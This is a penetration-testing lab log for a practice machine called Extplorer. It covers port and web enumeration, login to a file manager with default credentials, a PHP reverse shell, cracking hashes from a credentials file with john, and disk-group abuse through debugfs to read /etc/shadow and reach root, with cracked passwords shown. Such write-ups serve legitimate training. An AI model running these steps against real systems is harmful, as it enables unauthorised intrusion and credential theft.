🧪 Pentest Log: {{date:2025-08-10}}

🔍 Target Information

• Machine Name: Extplorer
• IP Address: 192.168.187.16
• Operating System: Linux

ip=192.168.187.16

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

ImageMagick Identifier Version: 6.9.6-4

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

found /filemanager, login with

admin:admin

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

mousepad shell.php

penelope -p 80

🧬 Privilege Escalation

👤 Current Access

• User: www-data
• Groups: www-data
• Shell Type: reverse shell

🔍 Enumeration

Manual:

cat var/www/html/filemanager/config/.htusers.php

found

	array('admin','21232f297a57a5a743894a0e4a801fc3','/var/www/html','http://localhost','1','','7',1),
	array('dora','$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS','/var/www/html','http://localhost','1','','0',1),

Crack dora's hash using john

john hash --wordlist='/home/kali/Documents/oscp/rockyou.txt'

dora:doraemon

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Disk Group Abuse
• Target Binary/Service: N/A
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

debugfs /dev/sda3
mkdir test

cat /etc/shadow

john hash --wordlist='/home/kali/Documents/oscp/rockyou.txt'

obtain root credential

root:explorer

• Smash to root

su -